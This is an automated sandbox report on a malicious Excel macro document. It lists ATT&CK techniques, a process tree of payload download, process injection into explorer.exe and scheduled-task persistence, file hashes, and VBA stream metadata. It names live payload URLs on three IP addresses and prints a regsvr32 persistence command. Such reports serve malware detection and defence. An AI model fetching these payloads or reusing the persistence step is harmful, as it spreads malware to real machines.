    Valid Accounts | Command and Scripting Interpreter 11 | Scheduled Task/Job 1 | Process Injection 413 | Masquerading 121 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Scripting 2 | Logon Script (Windows) | Logon Script (Windows) | Modify Registry 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | Native API 3 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | Carrier Billing Fraud |
    Cloud Accounts | Exploitation for Client Execution 32 | Network Logon Script | Network Logon Script | Process Injection 413 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 2 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

    Behavior Graph

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    Behavior Graph ID: 491509
    Sample: Compensation-1730406737-092...
    Startdate: 27/09/2021
    Architecture: WINDOWS
    Score: 100

    Start node (2): Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); Sigma detected: Schedule system process; 7 other signatures. Started: EXCEL.EXE (node 9, counts 194 38), regsvr32.exe (node 14), regsvr32.exe (node 16).
    EXCEL.EXE (node 9): contacts 190.14.37.178, 49165, 80 (OffshoreRacksSAPA, Panama); 185.183.96.67, 49166, 80 (HSAE, Netherlands); 185.250.148.213, 49167, 80 (FIRSTDC-ASRU, Russian Federation). Dropped: C:\Users\user\...\44466.7022844907[3].dat (PE32), C:\Users\user\...\44466.7022844907[2].dat (PE32), C:\Users\user\...\44466.7022844907[1].dat (PE32). Signature: Document exploit detected (UrlDownloadToFile). Started: regsvr32.exe (node 18), regsvr32.exe (node 20), regsvr32.exe (node 22).
    regsvr32.exe (node 14): started regsvr32.exe (node 24).
    regsvr32.exe (node 18): started regsvr32.exe (node 27).
    regsvr32.exe (node 20): started regsvr32.exe (node 30).
    regsvr32.exe (node 22): started regsvr32.exe (node 32).
    regsvr32.exe (node 24): Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 2 other signatures. Started: explorer.exe (node 34, counts 8 1).
    regsvr32.exe (node 27): Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions. Started: explorer.exe (node 37, counts 8 1).
    regsvr32.exe (node 30): Allocates memory in foreign processes; Maps a DLL or memory area into another process. Started: explorer.exe (node 40), regsvr32.exe (node 43).
    regsvr32.exe (node 32): started explorer.exe (node 45).
    explorer.exe (node 34): dropped C:\Users\user\Drezd.red (PE32). Uses cmd line tools excessively to alter registry or file data. Started: reg.exe (node 47, count 1), reg.exe (node 49, count 1).
    explorer.exe (node 37): Uses cmd line tools excessively to alter registry or file data; Drops PE files to the user root directory; Uses schtasks.exe or at.exe to add and modify task schedules. Started: schtasks.exe (node 51).
    explorer.exe (node 40): dropped C:\Users\user\Drezd2.red (PE32).
    explorer.exe (node 45): dropped C:\Users\user\Drezd1.red (PE32).

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    Compensation-1730406737-09272021.xls | 0% | Virustotal |

    Dropped Files

    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat | 100% | Joe Sandbox ML |

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://www.%s.comPA | 0% | URL Reputation | safe
    http://190.14.37.178/44466.7022844907.dat | 0% | Avira URL Cloud | safe
    http://185.250.148.213/44466.7022844907.dat | 0% | Avira URL Cloud | safe
    http://185.183.96.67/44466.7022844907.dat | 0% | Avira URL Cloud | safe
    http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://190.14.37.178/44466.7022844907.dat | false | Avira URL Cloud: safe | unknown
    http://185.250.148.213/44466.7022844907.dat | false | Avira URL Cloud: safe | unknown
    http://185.183.96.67/44466.7022844907.dat | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.%s.comPA | regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000002.433161953.0000000002190000.00000002.00020000.sdmp | false | URL Reputation: safe | low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp | false | | high
    http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.422807773.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.420832394.0000000001BC0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.433067223.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.430171202.0000000000950000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

      Contacted IPs


      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      185.183.96.67 | unknown | Netherlands | 60117 | HSAE | false
      190.14.37.178 | unknown | Panama | 52469 | OffshoreRacksSAPA | false
      185.250.148.213 | unknown | Russian Federation | 48430 | FIRSTDC-ASRU | false

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:491509
      Start date:27.09.2021
      Start time:16:50:18
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 13m 13s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Compensation-1730406737-09272021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:25
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/12@0/3
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 20.4% (good quality ratio 18.8%)
      • Quality average: 74.7%
      • Quality standard deviation: 29.3%
      HCA Information:
      • Successful, ratio: 83%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
      • TCP Packets have been reduced to 100
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      Time | Type | Description
      16:51:23 | API Interceptor | 62x Sleep call for process: regsvr32.exe modified
      16:51:25 | API Interceptor | 888x Sleep call for process: explorer.exe modified
      16:51:27 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
      16:51:28 | Task Scheduler | Run new task: fpdnnxq path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      Match | Associated Sample Name / URL | Detection | Context
      HSAE | KHI13mrm4c.exe | malicious | 185.183.98.2
      HSAE | Copy of Payment-228607772-09222021.xls | malicious | 185.82.202.248
      HSAE | NJS4hNBeUR.exe | malicious | 185.198.57.68
      HSAE | rQoEGMGufv.exe | malicious | 185.45.192.203
      HSAE | 5ya8R7LxXl.exe | malicious | 185.45.192.203
      HSAE | Uz2eSldsZe.exe | malicious | 185.45.192.203
      HSAE | SWIFT_COPY.htm | malicious | 194.36.191.196
      HSAE | 3hTS09wZ7G.exe | malicious | 185.183.96.3
      HSAE | 040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exe | malicious | 185.183.96.3
      HSAE | OC2Z0JbqfA.exe | malicious | 185.183.96.3
      HSAE | 89o9iHBGiB.exe | malicious | 185.183.96.3
      HSAE | DWVByMCYL8.exe | malicious | 185.183.96.3
      HSAE | DUpgpAnHkq.exe | malicious | 185.183.96.3
      HSAE | 7EAz8cQ49v.exe | malicious | 185.183.96.3
      HSAE | f9aoawyl4M.exe | malicious | 185.183.96.3
      HSAE | 7da1ac7cd7a61715807d49e8c79b054ba302b3988ba19.exe | malicious | 185.183.96.3
      HSAE | 38fd2cb3083f33b50606b7821453769103bde24335734.exe | malicious | 185.183.96.3
      HSAE | JSYInjvdnM.exe | malicious | 185.183.96.3
      HSAE | KlErfuBsH2.exe | malicious | 185.183.96.3
      HSAE | qB6P2WfUjb.exe | malicious | 185.183.96.3

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528544078109707
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M5:vs6Xpq0H3Jhds/9+qC/zfTPLv
      MD5:4B0D7EAB4203C3E8CF8ABA423AEB4167
      SHA1:BB53264B45F27738AD5A89CB304C129C35044D20
      SHA-256:09E68587EEE29DF07C5893F10FBA90EF9032C4901785C62D4D154CACFDD2D20A
      SHA-512:7E0CAB00C3A0E14BD07314F46A824F5166391FD0A15B55C0E4CD04F7C9CA9E630818576A8651B9ABF0141E9F1E54B820441D543F45733F2B0EFE11BBC413DBA0
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528544078109707
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M5:vs6Xpq0H3Jhds/9+qC/zfTPLv
      MD5:4B0D7EAB4203C3E8CF8ABA423AEB4167
      SHA1:BB53264B45F27738AD5A89CB304C129C35044D20
      SHA-256:09E68587EEE29DF07C5893F10FBA90EF9032C4901785C62D4D154CACFDD2D20A
      SHA-512:7E0CAB00C3A0E14BD07314F46A824F5166391FD0A15B55C0E4CD04F7C9CA9E630818576A8651B9ABF0141E9F1E54B820441D543F45733F2B0EFE11BBC413DBA0
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528544078109707
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M5:vs6Xpq0H3Jhds/9+qC/zfTPLv
      MD5:4B0D7EAB4203C3E8CF8ABA423AEB4167
      SHA1:BB53264B45F27738AD5A89CB304C129C35044D20
      SHA-256:09E68587EEE29DF07C5893F10FBA90EF9032C4901785C62D4D154CACFDD2D20A
      SHA-512:7E0CAB00C3A0E14BD07314F46A824F5166391FD0A15B55C0E4CD04F7C9CA9E630818576A8651B9ABF0141E9F1E54B820441D543F45733F2B0EFE11BBC413DBA0
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.254441838317247
      Encrypted:false
      SSDEEP:1536:C6IL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CpJNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:70473B0C7F1A6F72E5CC4E6AEAED2A71
      SHA1:DF5905D6593A8FDCCE2B294D7E18802B512F6F0D
      SHA-256:309BE4CD584F9D0695E0AA9C23267FB6F0423B4FDEF25206013861848F0CC25F
      SHA-512:79B6E4F115568CE3D20340C4E1353DAE1189CC7C765A257F5F9F6B5248F79589B5C13AF1701359745B2E04C2151FCBFC12E7364CCCC501B710738232519A9897
      Malicious:false
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):15676
      Entropy (8bit):4.533027176775501
      Encrypted:false
      SSDEEP:192:WLQxlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:WLQ38xesT20lheZ3waE5D7qxIxkxe
      MD5:5D875E34DEB2FB6764D59C36A6062310
      SHA1:EA3E3E00385E1D4D0D91614AFA63F800A082E4D5
      SHA-256:1F50C89EFA09339ADD45C4C2265DACC4743277B008D23EFBB6F48EE06D2B9837
      SHA-512:EC691FD8048A912E4DE1DEDCB3FF96F61599D8965C184E7ED71BA490D2A5EC5EC536853576FA9A4F943B65B03848E353407E6A2187A2A27E6973DA1D5B31E5D2
      Malicious:false
      Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ...............#M..v.K.~.x.............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...
      C:\Users\user\Drezd.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\Drezd1.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\Drezd2.red
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):1.6961804656486577
      Encrypted:false
      SSDEEP:1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
      MD5:B19B0AF9A01DD936D091C291B19696C8
      SHA1:862ED0B9586729F2633670CCD7D075D7693908E1
      SHA-256:17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
      SHA-512:9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
      Malicious:true
      Reputation:unknown

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
      Entropy (8bit):7.131912306364678
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Compensation-1730406737-09272021.xls
      File size:129024
      MD5:b4b3a2223765ac84c9b1b05dbf7c6503
      SHA1:57bc35cb0c7a9ac6e7fcb5dea5c211fe5eda5fe0
      SHA256:3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36
      SHA512:52b33c60f4f3b1043915fc595aaf1684fe558d82c778a8cb078916daa565f36f12d5fe023ea7611c39f0e2c48bb241eb481b02b2160ba4e97f402c9b75cae500
      SSDEEP:3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiilBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAnE
      File Content Preview:........................>.......................................................b..............................................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "Compensation-1730406737-09272021.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:Test
      Last Saved By:Test
      Create Time:2015-06-05 18:17:20
      Last Saved Time:2021-09-27 09:38:52
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576

      Streams with VBA

      VBA File Name: UserForm2, Stream Size: -1
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2
      VBA File Name:UserForm2
      Stream Size:-1
      Data ASCII:
      Data Raw:
      VBA Code
      VBA File Name: Module5, Stream Size: 4241
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Module5
      VBA File Name:Module5
      Stream Size:4241
      VBA Code
      VBA File Name: Sheet1, Stream Size: 991
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1
      Stream Size:991
      VBA Code
      VBA File Name: ThisWorkbook, Stream Size: 2501
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook
      Stream Size:2501
      VBA Code
      VBA File Name: UserForm2, Stream Size: 1182
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
      VBA File Name:UserForm2
      Stream Size:1182
      VBA Code

      Streams

      Stream Path: \x1CompObj, File Type: data, Stream Size: 108
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:108
      Entropy:4.18849998853
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:244
      Entropy:2.65175227267
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:208
      Entropy:3.33231709703
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:101831
      Entropy:7.65479066874
      Base64 Encoded:True
      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:662
      Entropy:5.27592988154
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
      Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTlk
      File Type:dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
      Stream Size:30
      Entropy:1.37215976263
      Base64 Encoded:False
      Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
      General
      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
      File Type:data
      Stream Size:116
      Entropy:3.43722878834
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x1CompObj
      File Type:data
      Stream Size:97
      Entropy:3.61064918306
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
      Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302
      General
      Stream Path:_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
      File Type:ASCII text, with CRLF line terminators
      Stream Size:302
      Entropy:4.65399600072
      Base64 Encoded:True
